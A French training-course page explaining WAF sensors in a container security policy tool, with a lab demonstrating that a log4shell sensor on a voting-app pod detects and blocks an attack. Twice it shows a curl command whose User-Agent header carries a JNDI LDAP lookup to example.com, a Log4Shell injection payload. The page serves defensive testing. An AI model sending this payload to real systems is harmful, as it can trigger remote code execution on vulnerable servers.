Aller au contenu principal
Sommaire de la formation

Les Policies rules: WAF Sensors

coolibra94 vues

3. Les Policies rules

  • WAF Sensors


3.3 WAF Sensors

Les WAF Sensors (Web Application Firewall) analysent le trafic applicatif pour identifier et bloquer les attaques ciblant les applications web, comme les injections SQL, les scripts inter-sites (XSS) ou les tentatives d’exploitation de vulnérabilités. Ils protègent les services web tout en fournissant des rapports détaillés sur les menaces détectées.

 

  • Avant l'activation du sensor log4shell, on verifie que l'attque est autorisée.
    • Dans Policy > Groups > activer Protect et Basic mode

 

    • Lancer cette requette sur le vote app: http://node_ip:31000/
curl -v http://10.10.10.243:31000/   -H 'User-Agent: ${jndi:ldap://example.com/test}'

 

    • On voit bien que la requette est autorisée et l'attaque passe.

 

  • Maintenant on active le sensor log4shell sur le pod vote
    • Dans Policy > Groups > select le group nv.vote.voting-app > WAF > Configure

 

 

    • Lancer cette requette sur le vote app: http://node_ip:31000/
curl -v http://10.10.10.243:31000/   -H 'User-Agent: ${jndi:ldap://example.com/test}'

 

    • L'attaque est bien detectée et blquée. Une alerte Critical est levée

 

    • Une capture automatique de paquets a été effectuée. On peut télécharger pour une analyse plus approfondie par d'autres outils comme wireshark

 

 

 

Commentaires

Connectez-vous pour rejoindre la discussion.

Aucun commentaire pour le moment.